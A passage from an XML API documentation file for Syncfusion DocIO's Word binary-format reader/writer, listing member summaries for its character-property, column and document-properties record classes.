            Gets/sets Font Shading property
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties.ShadingNew">
            <summary>
            Gets/sets Font Shading property
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties.Border">
            <summary>
            Gets/sets Border property
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties.StickProperties">
            <summary>
            Gets/sets coping of sprms or not
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties.Special">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties.Symbol">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties.HiddenComplex">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties.DoubleStrikeComplex">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties.SmallCapsComplex">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties.FldVanish">
            <summary>
            Gets/sets Bold property
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties.FldVanishComplex">
            <summary>
            Gets/sets Bold property
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties.NoProof">
            <summary>
            Gets or sets a value indicating whether no proof.
            </summary>
            <value>if it is no proof, set to <c>true</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties.IdctHint">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties.IsInsertRevision">
            <summary>
            Gets a value indicating whether this instance is inserted change.
            </summary>
            <value>
            	<c>true</c> if this instance is inserted change; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties.IsDeleteRevision">
            <summary>
            Gets a value indicating whether this instance is deleted change.
            </summary>
            <value>
            	<c>true</c> if this instance is deleted change; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties.IsChangedFormat">
            <summary>
            Defines whether formatting was changed.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties.ListPictureIndex">
            <summary>
            Gets or sets the index of the list pictture.
            </summary>
            <value>The index of the list pictture.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties.ListHasImage">
            <summary>
            Gets or sets a value indicating whether [list has image].
            </summary>
            <value><c>true</c> if [list has image]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties.BoldBi">
            <summary>
            Gets/sets Bold property
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties.ItalicBi">
            <summary>
            Gets/sets Italic property
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties.Bidi">
            <summary>
            Gets/sets Bold property
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties.FontSizeBi">
            <summary>
            Gets/sets FontSizeHP property
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties.StyleSheet">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties.IsOle2">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties.IsData">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties.CharacterStyleId">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties.LocaleIdASCII">
            <summary>
            Gets or sets the language\locale identifier ASCII for older Word version.
            </summary>
            <value>
            The language\locale identifier ASCII.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties.LocaleIdASCII1">
            <summary>
            Gets or sets the language\locale identifier for ASCII characters in later Word version.
            </summary>
            <value>
            The language\locale identifier for ASCII characters.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties.LocaleIdFarEast">
            <summary>
            Gets or sets the language\locale identifier for far east characters in older Word version.
            </summary>
            <value>
            The language\locale identifier for far east characters.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties.LocaleIdFarEast1">
            <summary>
            Gets or sets the language\locale identifier for far east characters in later Word version.
            </summary>
            <value>
            The language\locale identifier for far east characters.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties.LidBi">
            <summary>
            Gets or sets the language\locale identifier for bi-directional characters.
            </summary>
            <value>
            The language\locale identifier for bi-directional characters.
            </value>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.CharacterPropertiesPage">
            <summary>
            Summary description for FKPForCharacterProperties = CharPropertiesPage.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.CharacterPropertiesPage.DEF_FC_SIZE">
            <summary>
            Size of the FC (File Character position).
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.CharacterPropertiesPage.m_arrFC">
            <summary>
            Each FC is the limit FC of a run of exception text.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.CharacterPropertiesPage.m_arrCHPX">
            <summary>
            Consists of all of the CHPXs stored in FKP concatenated end to end.
            Each CHPX is prefixed with a count of bytes which records its length.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.CharacterPropertiesPage.#ctor">
            <summary>
            Default constructor.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.CharacterPropertiesPage.#ctor(Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.FKPStructure)">
            <summary>
            
            </summary>
            <param name="structure"></param>
            <param name="converter"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.CharacterPropertiesPage.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.CharacterPropertiesPage.Parse(Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.FKPStructure)">
            <summary>
            
            </summary>
            <param name="structure"></param>
            <param name="converter"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.CharacterPropertiesPage.Save">
            <summary>
            
            </summary>
            <param name="converter"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.CharacterPropertiesPage.Save(System.Byte[],System.Int32)">
            <summary>
            Saves record into array of bytes.
            </summary>
            <param name="arrData">Array of bytes to save record into.</param>
            <param name="iOffset">Offset in the array.</param>
            <returns>Number of bytes in the written data.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.CharacterPropertiesPage.SaveToStream(System.IO.BinaryWriter,System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="writer"></param>
            <param name="stream"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.CharacterPropertiesPage.IsChpxRepeats(System.Int32,System.Int32@)">
            <summary>
            checks whether the Chpx at the current index is already parsed. (already added to offset array)
            </summary>
            <param name="CurrentIndex">Current Index</param>
            <returns></returns>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.CharacterPropertiesPage.FileCharPos">
            <summary>
            Each FC is the limit FC of a run of exception text.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.CharacterPropertiesPage.CharacterProperties">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.CharacterPropertiesPage.RunsCount">
            <summary>
            Count of runs.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.CharacterPropertiesPage.Length">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterPropertyException">
            <summary>
            Summary description for CharPropertyException (CHPX).
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterPropertyException.m_btLength">
            <summary>
            Count of bytes of following data in CHPX.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterPropertyException.m_arrSprms">
            <summary>
            A list of the sprms (Single PRoperty modifier) that encode
            the differences between CHP (CHaracter property) for a run
            of text and the CHP generated by the paragraph and character
            styles that tag the run.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterPropertyException.#ctor">
            <summary>
            Default constructor.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterPropertyException.#ctor(System.Byte[],System.Int32)">
            <summary>
            Default constructor.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterPropertyException.#ctor(Syncfusion.DocIO.ReaderWriter.Biff_Records.UniversalPropertyException)">
            <summary>
            
            </summary>
            <param name="property"></param>
            <param name="converter"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterPropertyException.#ctor(System.Byte[])">
            <summary>
            
            </summary>
            <param name="arrData"></param>
            <param name="iOffset"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterPropertyException.Parse(System.Byte[],System.Int32,System.Int32)">
            <summary>
            Parses the specified data.
            </summary>
            <param name="arrData">The data.</param>
            <param name="iOffset">The offset.</param>
            <param name="iCount">The count.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterPropertyException.Save(System.Byte[],System.Int32)">
            <summary>
            Saves record into array of bytes.
            </summary>
            <param name="arrData">Array of bytes to save record into.</param>
            <param name="iOffset">Offset in the array.</param>
            <returns>Number of bytes in the written data.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterPropertyException.Save(System.IO.BinaryWriter,System.IO.Stream,System.Int32)">
            <summary>
            
            </summary>
            <param name="writer"></param>
            <param name="stream"></param>
            <param name="length"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterPropertyException.HasSprms">
            <summary>
            Determines whether this instance has SPRMS.
            </summary>
            <returns>
            	<c>true</c> if this instance has SPRMS; otherwise, <c>false</c>.
            </returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterPropertyException.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterPropertyException.Equals(Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterPropertyException)">
            <summary>
            Returns a value indicating whether this instance is equal to the character property exception passed as argument.
            </summary>
            <param name="chpx">chpx</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterPropertyException.IsSprmEqual(Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierRecord,Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierRecord,Syncfusion.DocIO.ReaderWriter.SprmCompareType)">
            <summary>
            Check whether the sprm passed in the arguments are equal.
            </summary>
            <param name="sprm">sprm</param>
            <param name="prevSprm">prevSprm</param>
            <param name="sprmCompareType">sprm Compare type</param>
            <returns></returns>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterPropertyException.PropertyModifiers">
            <summary>
            A list of the sprms (Single PRoperty modifier) that encode
            the differences between CHP (CHaracter property) for a run
            of text and the CHP generated by the paragraph and character
            styles that tag the run.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterPropertyException.ModifiersCount">
            <summary>
            Returns number of property modifiers. Read-only.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterPropertyException.Length">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterPropertyException.Special">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterPropertyException.EmbededObj">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterPropertyException.IsData">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterPropertyException.CharacterStyleId">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterPropertyException.Bold">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterPropertyException.Italic">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterPropertyException.Strike">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterPropertyException.UnderlineCode">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterPropertyException.FontAscii">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterPropertyException.FontFarEast">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterPropertyException.FontNonFarEast">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterPropertyException.FontSizeHP">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterPropertyException.FontColor">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterPropertyException.DBG_FontColor">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterPropertyException.Outline">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterPropertyException.Shadow">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharPosTableRecord">
            <summary>
            Summary description for CharPosTable.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharPosTableRecord.m_arrPositions">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharPosTableRecord.#ctor">
            <summary>
            Default constructor.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharPosTableRecord.#ctor(System.Byte[])">
            <summary>
            Creates new record from array of bytes, using specified memory provider.
            </summary>
            <param name="data">Data to parse.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharPosTableRecord.#ctor(System.Byte[],System.Int32)">
            <summary>
            Creates new record from array of bytes, using specified memory provider.
            </summary>
            <param name="arrData">Data to parse.</param>
            <param name="iOffset">Offset to the class data.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharPosTableRecord.#ctor(System.Byte[],System.Int32,System.Int32)">
            <summary>
            Creates new record from array of bytes, using specified memory provider.
            </summary>
            <param name="arrData">Data to parse.</param>
            <param name="iOffset">Offset to the class data.</param>
            <param name="iCount">Number of bytes for the new record.</param>
            <param name="converter">MemoryConverter to convert array of bytes into structure.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharPosTableRecord.#ctor(System.IO.Stream,System.Int32)">
            <summary>
            Creates new record from stream.
            </summary>
            <param name="stream">Stream with record's data.</param>
            <param name="iCount">Number of bytes to parse.</param>
            <param name="converter">MemoryConverter to convert array of bytes into structure.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharPosTableRecord.GetTextChunk(System.String,System.Int32)">
            <summary>
            
            </summary>
            <param name="text"></param>
            <param name="position"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharPosTableRecord.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharPosTableRecord.Parse(System.Byte[],System.Int32,System.Int32)">
            <summary>
            Parses record.
            </summary>
            <param name="arrData">Data to parse.</param>
            <param name="iOffset">Offset in the data array to the records data.</param>
            <param name="iCount">Number of bytes to parse.</param>
            <param name="converter">MemoryConverter to convert array of bytes into structure.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharPosTableRecord.Save(System.Byte[],System.Int32)">
            <summary>
            
            </summary>
            <param name="arrData"></param>
            <param name="iOffset"></param>
            <param name="converter"></param>
            <returns></returns>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharPosTableRecord.Positions">
            <summary>
            Gets text positions. Read-only.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharPosTableRecord.Length">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.ColumnArray">
            <summary>
            Summary description for ColumnArray.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.ColumnArray.DEF_DISTANCE_BETWEEN_COLUMNS">
            <summary>
            Default distance between coumns in twips
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.ColumnArray.m_sprms">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ColumnArray.#ctor(Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierArray)">
            <summary>
            
            </summary>
            <param name="sprms"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ColumnArray.AddColumn">
            <summary>
            
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ColumnArray.AddEmptyColumn">
            <summary>
            
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ColumnArray.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ColumnArray.ReadColumnsProperties">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ColumnArray.Item(System.Int32)">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ColumnArray.ColumnsEvenlySpaced">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.ColumnDescriptor">
            <summary>
            Summary description for ColumnDescriptor.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.ColumnDescriptor.DEF_WIDTH">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.ColumnDescriptor.m_widthRecord">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ColumnDescriptor.#ctor(Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierRecord,Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierRecord)">
            <summary>
            
            </summary>
            <param name="width"></param>
            <param name="space"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ColumnDescriptor.#ctor">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ColumnDescriptor.Width">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ColumnDescriptor.Space">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DataStructure">
            <summary>
            Abstract class which represents data structures.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DataStructure.Parse(System.Byte[],System.Int32)">
            <summary>
            Parse the data strucure
            </summary>
            <param name="arrData">Bytes with data</param>
            <param name="iOffset">Offset</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DataStructure.Save(System.Byte[],System.Int32)">
            <summary>
            Saves the data structure.
            </summary>
            <param name="arrData">The destination array.</param>
            <param name="iOffset">The offset.</param>
            <returns>Length</returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DataStructure.ReadInt16(System.Byte[],System.Int32@)">
            <summary>
            Reads the int16.
            </summary>
            <param name="arrData">The data array.</param>
            <param name="iOffset">The offset.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DataStructure.ReadInt32(System.Byte[],System.Int32@)">
            <summary>
            Reads the int32.
            </summary>
            <param name="arrData">The data array.</param>
            <param name="iOffset">The offset.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DataStructure.ReadInt64(System.Byte[],System.Int32@)">
            <summary>
            Reads the int64.
            </summary>
            <param name="arrData">The data array.</param>
            <param name="iOffset">The offset.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DataStructure.ReadUInt16(System.Byte[],System.Int32@)">
            <summary>
            Reads the int16.
            </summary>
            <param name="arrData">The data array.</param>
            <param name="iOffset">The offset.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DataStructure.ReadUInt32(System.Byte[],System.Int32@)">
            <summary>
            Reads the int32.
            </summary>
            <param name="arrData">The data array.</param>
            <param name="iOffset">The offset.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DataStructure.ReadBytes(System.Byte[],System.Int32,System.Int32@)">
            <summary>
            Reads the array of bytes.
            </summary>
            <param name="arrData">The data array.</param>
            <param name="length">The length.</param>
            <param name="iOffset">The offset.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DataStructure.WriteInt16(System.Byte[],System.Int32@,System.Int16)">
            <summary>
            Saves the specified int16 value in the data array.
            </summary>
            <param name="arrData">The arr data.</param>
            <param name="iOffset">The offset.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DataStructure.WriteUInt16(System.Byte[],System.Int32@,System.UInt16)">
            <summary>
            Saves the specified uint16 value in the data array.
            </summary>
            <param name="arrData">The arr data.</param>
            <param name="iOffset">The offset.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DataStructure.WriteInt32(System.Byte[],System.Int32@,System.Int32)">
            <summary>
            Saves the specified int32 value in the data array.
            </summary>
            <param name="arrData">The arr data.</param>
            <param name="iOffset">The offset.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DataStructure.WriteInt64(System.Byte[],System.Int32@,System.Int64)">
            <summary>
            Saves the specified int64 value in the data array.
            </summary>
            <param name="destination">The destination.</param>
            <param name="iOffset">The offset.</param>
            <param name="val">The value.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DataStructure.WriteUInt32(System.Byte[],System.Int32@,System.UInt32)">
            <summary>
            Saves the specified uint32 value in the data array.
            </summary>
            <param name="arrData">The arr data.</param>
            <param name="iOffset">The offset.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DataStructure.WriteBytes(System.Byte[],System.Int32@,System.Byte[])">
            <summary>
            Saves the bytes byte array.
            </summary>
            <param name="destination">The destination array.</param>
            <param name="iOffset">The offset.</param>
            <param name="bytes">The bytes.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DataStructure.CopyMemory(System.Byte[],System.Byte[],System.Int32)">
            <summary>
            Copies the memory.
            </summary>
            <param name="destination">The destination.</param>
            <param name="source">The source.</param>
            <param name="length">The length.</param>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DataStructure.Length">
            <summary>
            Gets the size of the structure.
            </summary>
            <value>The length.</value>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOPDescriptor">
            <summary>
            Summary description for DOPStructure.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOPDescriptor.DEF_PROTECTION_KEY">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOPDescriptor.DEF_MAX_PASSWORDLEN">
            <summary>
            Maximum length of the password.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOPDescriptor.DEF_PASSWORD_CONST">
            <summary>
            Default password hash value.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOPDescriptor.#ctor">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOPDescriptor.#ctor(System.IO.Stream,System.Int32,System.Int32,System.Boolean)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOPDescriptor"/> class.
            </summary>
            <param name="stream">The stream.</param>
            <param name="dopStart">The DOPDescriptor start.</param>
            <param name="dopLength">Length of the dop.</param>
            <param name="isTemplate">if set to <c>true</c> document is template.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOPDescriptor.UpdateDateTime(Syncfusion.DocIO.DLS.BuiltinDocumentProperties)">
            <summary>
            Update date time values with reference to built in document properties.
            </summary>
            <param name="builtInDocumnetProperties">Built in document properties</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOPDescriptor.Write(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="stream"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOPDescriptor.Clone">
            <summary>
            
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOPDescriptor.SetProtection(Syncfusion.DocIO.ProtectionType,System.String)">
            <summary>
            Sets the document protection.
            </summary>
            <param name="type">The type.</param>
            <param name="password">The password.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOPDescriptor.ParseDateTime(System.UInt32)">
            <summary>
            Parses the date time.
            Date and Time (internal date format) (DTTM)
            field | type | size | bitfield | comment 
            mint  | U16  |  :6  |  003F    | minutes (0-59) 
            hr    | U16  |  :5  |  07C0    | hours (0-23) 
            dom   | U16  |  :5  |  F800    | days of month (1-31) 
            mon   | U16  |  :4  |  000F    | months (1-12) 
            yr    | U16  |  :9  |  1FF0    | years (1900-2411)-1900 
            wdy   | U16  |  :3  |  E000    | weekday
            Weekday: Sunday=0, Monday=1, Tuesday=2, Wednesday=3, Thursday=4, Friday=5, Saturday=6 
            </summary>
            <param name="dateTime">The date time.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOPDescriptor.SetDateTime(System.DateTime)">
            <summary>
            Sets the date time.
            </summary>
            <param name="dt">The dt.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOPDescriptor.ConvertDayOfWeek(System.DayOfWeek)">
            <summary>
            Converts the day of week to integer.
            </summary>
            <param name="dow">The DayOfWeek member.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOPDescriptor.GetPasswordHash(System.String)">
            <summary>
            Returns hash value for the password string.
            </summary>
            <param name="password">Password to hash.</param>
            <returns>Hash value for the password string.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOPDescriptor.GetCharBits15(System.Char)">
            <summary>
            Converts character to 15 bits sequence
            </summary>
            <param name="charToConvert">Character to convert.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOPDescriptor.GetUInt16FromBits(System.Boolean[])">
            <summary>
            Converts bits array to UInt16 value.
            </summary>
            <param name="bits">Array to convert.</param>
